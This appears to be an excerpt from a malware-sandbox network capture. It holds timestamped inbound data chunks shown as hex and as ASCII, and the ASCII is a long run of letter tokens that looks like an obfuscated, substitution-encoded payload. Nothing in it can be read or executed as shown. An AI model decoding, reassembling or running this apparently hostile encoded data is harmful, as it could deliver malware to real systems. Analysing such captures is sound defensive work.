                                                                                                2021-10-26 15:35:13 UTC4376INData Raw: 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 50 4d 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 55 50 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 50 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 54 53 53 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 69 67 20 53 20 55 54 20 53 20 4f 53 20 53 20 69 4f 20 53 20 55 53 20 53 20 54 53 67 20 53 20 55 6e 20 53 20 54 54 50 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20
                                                                                                Data Ascii: S TTT S TTO S pO S pP S pP S TSP S UP S UU S PM S in S PT S UU S Pp S in S TMS S Un S UP S TTO S pO S pP S pP S in S TMS S UP S TSg S TTO S pO S pP S pP S Pi S TSS S TSn S pP S pP S pP S pn S pU S ig S UT S OS S iO S US S TSg S Un S TTP S UM S pP S pP S
                                                                                                2021-10-26 15:35:13 UTC4377INData Raw: 20 53 20 70 55 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 67 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 55 69 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 70 70 20 53 20 55 69 20 53 20 55 50 20 53 20 69 4f 20 53 20 55 53 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 53 20 53 20 70 55 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 55 50 20 53
                                                                                                Data Ascii: S pU S Pi S TMT S pU S in S TSS S Ug S pU S in S TSS S UM S TMM S in S TSS S UM S TSp S in S TSS S UM S Ui S in S TSS S UM S pp S Ui S UP S iO S US S in S TSS S UT S TMM S in S TSS S UT S TSp S in S nS S OS S pU S pP S UT S pP S pn S nS S TTO S nM S UP S
                                                                                                2021-10-26 15:35:13 UTC4378INData Raw: 55 54 20 53 20 6e 6e 20 53 20 55 70 20 53 20 54 54 69 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 4f 55 20 53 20 50 54 20 53 20 54 54 4f 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 54 53 70 20 53 20 69 67 20 53 20 69 6e 20 53 20 50 70 20 53 20 54 53 54 20 53 20 6e 53 20 53 20 55 54 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 70 6e 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55
                                                                                                Data Ascii: UT S nn S Up S TTi S TSg S pO S pP S UT S pP S pP S TSp S OU S PT S TTO S in S US S in S in S OS S TTT S TSO S TSS S TMT S np S TSp S ig S in S Pp S TST S nS S UT S US S in S in S in S iU S UT S pP S pP S pP S pU S TTT S TTT S pn S UP S pP S pP S nS S TSU
                                                                                                2021-10-26 15:35:13 UTC4380INData Raw: 69 20 53 20 54 53 4f 20 53 20 54 54 54 20 53 20 54 53 55 20 53 20 55 70 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 50 6e 20 53 20 50 70 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 55 50 20 53 20 54 53 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 70 70 20 53 20 4f 53 20 53 20 55 6e 20 53 20 55 55 20 53 20 55 54 20 53 20 50 6e 20 53 20 4f 6e 20 53 20 70 50 20 53 20 55 54 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 54 20 53 20 70 55 20 53 20 50 69 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 55 70 20 53 20 69 6e 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 4d 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e
                                                                                                Data Ascii: i S TSO S TTT S TSU S Up S PM S TSU S Pn S Pp S nO S TSp S UP S TSp S UT S pP S pP S TSi S OO S pp S OS S Un S UU S UT S Pn S On S pP S UT S pp S pP S pP S pn S nU S TSi S TST S pU S Pi S in S in S Pn S UT S Up S in S Pp S Up S TTM S nn S pp S pP S pP S n
                                                                                                2021-10-26 15:35:13 UTC4381INData Raw: 4f 20 53 20 54 53 6e 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 70 20 53 20 50 54 20 53 20 50 70 20 53 20 50 69 20 53 20 55 53 20 53 20 50 4d 20 53 20 54 54 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 55 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 55 20 53 20 50 70 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 4f 20 53 20 6e 53 20 53 20 54 53 50 20 53 20 6e 54 20 53 20 54 54 54 20 53 20 54 53 4d 20 53 20 55 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 54 20 53 20 6e 69 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 6e 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 4d 20 53 20 69 4f 20 53 20 54
                                                                                                Data Ascii: O S TSn S UM S pP S pP S pP S TSP S Up S PT S Pp S Pi S US S PM S TTp S pP S pP S pp S UU S TSp S UP S UU S Pp S UP S ng S iO S nS S TSP S nT S TTT S TSM S UP S ng S PS S nT S ni S pO S UT S pP S pP S nO S TSp S TTT S np S UT S pP S pP S TSg S PM S iO S T
                                                                                                2021-10-26 15:35:13 UTC4382INData Raw: 53 20 6e 4f 20 53 20 6e 55 20 53 20 4f 55 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 6e 50 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 55 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 50 69 20 53 20 70 55 20 53 20 54 53 54 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 69 20 53 20 54 53 69 20 53 20 55 70 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 55 67 20 53 20 6e 55 20 53 20 55 4d 20 53 20 55 4f 20 53 20 54 53 69 20 53 20 55 54 20 53 20 50 69 20 53 20 70 6e 20 53 20 55 6e 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 4f
                                                                                                Data Ascii: S nO S nU S OU S US S in S in S in S TTO S nP S nU S TSi S UT S pU S in S in S in S Pn S UT S Pi S pU S TST S nn S pP S pP S pn S ni S TSi S Up S TSp S in S in S in S ig S pU S TMS S pn S Ug S nU S UM S UO S TSi S UT S Pi S pn S Un S nn S pP S pP S pp S O
                                                                                                2021-10-26 15:35:13 UTC4384INData Raw: 20 53 20 55 54 20 53 20 54 53 69 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 54 20 53 20 54 53 50 20 53 20 70 4f 20 53 20 54 4d 54 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 70 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 69 6e 20 53 20 4f 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 54 54 6e 20 53 20 6e 54 20 53 20 54 54 6e 20 53 20 70 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 55 20 53 20 70 55 20 53 20 54 53 53 20 53 20 70 70 20 53 20 4f 6e 20 53 20 6e 55 20 53 20 55 67 20 53 20 55 53 20 53 20 69 67 20 53 20 70 55 20 53 20 69 67 20 53 20 55 54 20 53 20 54 4d 53 20 53 20 50 54 20 53 20 70 55 20 53 20 54 54 55 20 53 20 50 70 20 53 20 69 55 20 53 20 54 53 69
                                                                                                Data Ascii: S UT S TSi S iO S pU S nT S TSP S pO S TMT S UP S pP S pP S TSP S Pp S TSM S TTT S TSO S in S OU S in S in S PM S TTn S nT S TTn S pO S TTO S pP S pP S pU S TTU S pU S TSS S pp S On S nU S Ug S US S ig S pU S ig S UT S TMS S PT S pU S TTU S Pp S iU S TSi
                                                                                                2021-10-26 15:35:13 UTC4385INData Raw: 20 6e 53 20 53 20 54 54 67 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 54 69 20 53 20 6e 4f 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 69 4f 20 53 20 6e 53 20 53 20 50 53 20 53 20 6e 67 20 53 20 69 4f 20 53 20 69 4f 20 53 20 54 54 67 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 4f 53 20 53 20 50 50 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 55 20 53 20 54 54 54 20 53 20 6e 4f 20 53 20 50 70 20 53 20 55 53 20 53 20 6e 4d 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 55 69 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 50 20 53 20 6e 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 55 67 20 53 20 70 70
                                                                                                Data Ascii: nS S TTg S nS S pU S TTT S TTi S nO S PT S in S in S PM S iO S nS S PS S ng S iO S iO S TTg S nO S TSp S OS S PP S US S in S in S TSP S iU S UU S TTT S nO S Pp S US S nM S UM S TSM S Ui S TTT S TMS S pO S pP S pP S TSS S pP S nO S ni S UM S TSM S Ug S pp
                                                                                                2021-10-26 15:35:13 UTC4386INData Raw: 55 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 50 69 20 53 20 6e 70 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 4d 20 53 20 50 53 20 53 20 50 4d 20 53 20 54 54 70 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 50 6e 20 53 20 70 6e 20 53 20 6e 4f 20 53 20 54 54 50 20 53 20 55 50 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 54 53 6e 20 53 20 54 53 4d 20 53 20 54 53 53 20 53 20 70 50 20 53 20 6e 55 20 53 20 55 55 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 6e 53 20 53 20 55 69 20 53 20 4f 6e 20 53 20 70 6e 20 53 20 54 4d 4d 20 53 20 6e 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50
                                                                                                Data Ascii: U S Un S TTT S Pi S np S TSg S TTP S pP S pP S pP S TMM S PS S PM S TTp S iO S pU S ng S TTp S Pn S pn S nO S TTP S UP S OS S TSp S TSn S TSM S TSS S pP S nU S UU S Pi S TTO S nS S Ui S On S pn S TMM S nP S UT S pP S pU S in S nS S OS S TSp S pP S UT S pP
                                                                                                2021-10-26 15:35:13 UTC4388INData Raw: 20 6e 54 20 53 20 70 4f 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 55 20 53 20 4f 6e 20 53 20 6e 67 20 53 20 70 55 20 53 20 6e 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 54 53 69 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 67 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 4f 20 53 20 50 53 20 53 20 54 53 50 20 53 20 55 4f 20 53 20 54 4d 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 4f 20 53 20 55 54 20 53 20 54 53 50 20 53 20 55 54 20 53 20 4f 55 20 53 20 69 6e 20 53 20 69 4f 20 53 20 50 53 20 53 20 54 53 50 20 53 20 54 54 50 20 53 20 54 4d 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 4f 20 53 20 55 54
                                                                                                Data Ascii: nT S pO S US S in S UU S On S ng S pU S nP S UT S pP S pU S in S TSS S TSi S pn S ni S UM S TSg S TMM S in S iO S PS S TSP S UO S TMT S TSn S pP S pP S in S PT S UO S UT S TSP S UT S OU S in S iO S PS S TSP S TTP S TMT S TSn S pP S pP S in S PT S UO S UT
                                                                                                2021-10-26 15:35:13 UTC4389INData Raw: 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 70 20 53 20 70 55 20 53 20 69 6e 20 53 20 4f 4f 20 53 20 70 70 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 54 20 53 20 55 50 20 53 20 50 69 20 53 20 6e 4f 20 53 20 54 54 50 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 70 20 53 20 55 69 20 53 20 70 6e 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 53 4d 20 53 20 70 6e 20 53 20 55 54 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 70 50 20 53 20 70 4f 20 53 20 6e 4d 20 53 20 55 54 20 53 20 55 4d 20 53 20 69 6e 20 53 20 54 4d 4d 20 53 20 4f 55
                                                                                                Data Ascii: PT S UT S TSn S pO S US S Pn S iU S ni S pp S pU S in S OO S pp S pU S in S TSS S pn S UT S UP S Pi S nO S TTP S TSi S pP S pP S pn S pU S TMS S pp S Ui S pn S pO S pP S pn S pU S TSM S pn S UT S pO S pP S ng S TTp S pP S pO S nM S UT S UM S in S TMM S OU
                                                                                                2021-10-26 15:35:13 UTC4390INData Raw: 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 4f 53 20 53 20 69 67 20 53 20 6e 69 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 70 55 20 53 20 6e 67 20 53 20 69 4f 20 53 20 55 6e 20 53 20 70 50 20 53 20 54 54 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 6e 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 50 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 54 53 55 20 53 20 4f 55 20 53 20 54 54 54 20 53 20 54 53 50 20 53 20 54 4d 54 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 70 20 53 20 55 69 20 53 20 69 6e 20 53 20 50 54 20 53 20 4f 4f 20 53 20 55 54 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 70 55 20 53 20 54 54 54 20 53 20 6e 53 20 53 20 70 6e 20 53 20 70 4f 20 53 20 70 50 20
                                                                                                Data Ascii: S TSi S TSM S OS S ig S ni S TTT S TTp S nS S pU S ng S iO S Un S pP S TTn S TSi S pU S nP S TTO S pP S pP S TSP S iU S UP S nn S UM S TSU S OU S TTT S TSP S TMT S TTP S pP S pP S nS S pp S Ui S in S PT S OO S UT S On S TSg S pU S TTT S nS S pn S pO S pP
                                                                                                2021-10-26 15:35:13 UTC4392INData Raw: 53 20 69 6e 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 70 55 20 53 20 55 69 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 50 53 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 54 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 4f 4f 20 53 20 70 70 20 53 20 70 6e 20 53 20 6e 70 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 54 4d 20 53 20 6e 54 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 54 53 20 53 20 70 55 20 53 20 54 53 50 20 53 20 50 53 20 53 20 55 55 20 53 20 54 54 54 20 53 20 54 53 67 20 53 20 54 4d 4d 20 53 20 50 54 20 53 20 69 55 20 53 20 50 70 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50
                                                                                                Data Ascii: S in S TMS S pn S ni S UM S TST S Ug S pU S Ui S TSM S TMM S in S Pi S TMT S PS S np S UM S UT S TSp S in S OO S pp S pn S np S UM S TST S TMM S TTT S TTM S nT S ng S pP S pP S nS S TTS S pU S TSP S PS S UU S TTT S TSg S TMM S PT S iU S Pp S TSn S pP S pP
                                                                                                2021-10-26 15:35:13 UTC4393INData Raw: 20 54 4d 53 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 54 54 67 20 53 20 70 70 20 53 20 55 70 20 53 20 54 53 54 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 55 4f 20 53 20 54 53 70 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 53 20 53 20 55 69 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4d 20 53 20 55 55 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 70 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 70 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53
                                                                                                Data Ascii: TMS S pP S pP S pn S pU S TMS S pP S TMS S TTg S pp S Up S TST S ni S TSM S TSi S pU S in S nS S UO S TSp S pp S UT S pP S pU S in S TSS S TSi S pU S in S nS S OS S Ui S pp S UT S pP S pp S TSM S UU S TSU S TTU S pn S pp S pP S pp S Up S TSP S ig S TMT S
                                                                                                2021-10-26 15:35:13 UTC4394INData Raw: 69 67 20 53 20 6e 4d 20 53 20 69 55 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 50 54 20 53 20 54 54 50 20 53 20 4f 4f 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 54 20 53 20 55 50 20 53 20 4f 6e 20 53 20 70 50 20 53 20 55 54 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 4d 20 53 20 55 70 20 53 20 54 53 55 20 53 20 6e 69 20 53 20 55 54 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 70 55 20 53 20 69 6e 20 53 20 4f 4f 20 53 20 54 4d 53 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 55 20 53 20 54 4d 4d 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4d 20 53 20 55 55 20 53 20 54 54 50 20 53 20 54 54 53 20 53 20 70 55 20 53 20 54 53 50 20 53 20 69 55 20 53 20 50 4d 20 53 20 55 54 20 53 20 54 53 69 20 53
                                                                                                Data Ascii: ig S nM S iU S On S TSg S PT S TTP S OO S pP S nM S UT S UP S On S pP S UT S pn S pP S pP S pp S UM S Up S TSU S ni S UT S On S TSg S pU S in S OO S TMS S pU S in S nS S OU S TMM S pp S UT S pP S pp S TSM S UU S TTP S TTS S pU S TSP S iU S PM S UT S TSi S
                                                                                                2021-10-26 15:35:13 UTC4396INData Raw: 70 50 20 53 20 69 67 20 53 20 50 54 20 53 20 55 4d 20 53 20 55 54 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 4f 20 53 20 55 54 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 55 20 53 20 70 4f 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 69 20 53 20 54 53 4f 20 53 20 54 53 67 20 53 20 55 55 20 53 20 69 55 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 69 4f 20 53 20 70 70 20 53 20 50 4d 20 53 20 54 54 50 20 53 20 6e 54 20 53 20 54 53 50 20 53 20 50 70 20 53 20 50 50 20 53 20 69 6e 20 53 20 55 50 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 54 4d 4d 20 53 20 54 54 4f 20 53 20 6e 53 20 53 20 50 67 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 54
                                                                                                Data Ascii: pP S ig S PT S UM S UT S TMS S UT S in S PT S UO S UT S in S TMS S UU S pO S TTO S UP S pP S pP S Pi S TTO S TSi S TSO S TSg S UU S iU S ng S pP S pP S nU S iO S pp S PM S TTP S nT S TSP S Pp S PP S in S UP S pp S TTO S TMM S TTO S nS S Pg S TSS S TTO S T
                                                                                                2021-10-26 15:35:13 UTC4397INData Raw: 53 20 69 55 20 53 20 69 4f 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 55 20 53 20 50 4d 20 53 20 54 54 55 20 53 20 50 4d 20 53 20 50 69 20 53 20 6e 67 20 53 20 4f 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 67 20 53 20 70 50 20 53 20 54 53 55 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 55 20 53 20 50 4d 20 53 20 54 54 55 20 53 20 50 4d 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 4f 20 53 20 50 70 20 53 20 6e 53 20 53 20 50 6e 20 53 20 54 53 54 20 53 20 55 6e 20 53 20 50 70 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 50 50 20 53 20 70 70 20 53 20 70 70 20 53 20 55 6e 20 53 20 55 70 20 53 20 69 6e 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20
                                                                                                Data Ascii: S iU S iO S pU S in S iU S PM S TTU S PM S Pi S ng S OU S in S in S in S Pn S TTg S pP S TSU S TSM S in S iU S PM S TTU S PM S TSi S TSM S Pn S iO S Pp S nS S Pn S TST S Un S Pp S nU S Up S TSP S ig S TMT S pU S PP S pp S pp S Un S Up S in S Pn S iO S pU
                                                                                                2021-10-26 15:35:13 UTC4398INData Raw: 20 53 20 54 53 67 20 53 20 69 67 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 70 70 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 6e 6e 20 53 20 55 54 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 54 54 50 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 54 4d 4d 20 53 20 55 6e 20 53 20 54 54 4f 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 55 55 20 53 20 69 6e 20 53 20 69 4f 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 69 67 20 53 20 70 6e 20 53 20 54 54 55 20 53 20 6e 67 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 55 67 20 53 20
                                                                                                Data Ascii: S TSg S ig S TMS S UT S Up S TSU S TST S nU S UM S TSM S pp S UT S in S PT S nn S UT S in S TMS S Un S TTP S TTO S UP S pP S pP S TSP S TMM S Un S TTO S TTO S UP S pP S pP S On S TSi S UU S in S iO S TTT S TTp S nU S ig S pn S TTU S ng S On S TSi S Ug S
                                                                                                2021-10-26 15:35:13 UTC4400INData Raw: 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 6e 53 20 53 20 69 55 20 53 20 69 67 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 55 4d 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 54 53 67 20 53 20 54 4d 4d 20 53 20 54 53 67 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 69 55 20 53 20 70 4f 20 53 20 54 53 55 20 53 20 70 6e 20 53 20 50 4d 20 53 20 70 70 20 53 20 70 50 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 50 6e 20 53 20 50 70 20 53 20 55 53 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 69 20 53 20 54 4d 53 20 53 20 6e 54 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53
                                                                                                Data Ascii: S pP S pP S nP S nS S iU S ig S TSn S pP S pP S pp S UT S UM S Up S pP S pP S pp S TSO S TSg S TMM S TSg S pP S Un S Up S TSU S iU S pO S TSU S pn S PM S pp S pP S pO S pP S pP S ng S PS S Pn S Pp S US S PT S in S in S ig S TSi S TMS S nT S UT S pP S pP S
                                                                                                2021-10-26 15:35:13 UTC4401INData Raw: 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 6e 20 53 20 4f 6e 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 55 54 20 53 20 55 69 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 67 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 55 20 53 20 6e 4d 20 53 20 54 53 69 20 53 20 55 54 20 53 20 70 55 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 54 54 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 6e 69 20 53 20 54 4d 54 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53
                                                                                                Data Ascii: P S pP S pP S pn S pP S pP S pp S Un S On S US S TTO S pp S pP S pP S pn S nU S TSi S UT S Ui S ig S in S in S Pn S TTg S pP S nS S pU S nM S TSi S UT S pU S ig S in S in S Pp S TTU S pP S pP S pP S pP S Pi S ni S TMT S pp S pP S pP S pU S in S TSS S UT S
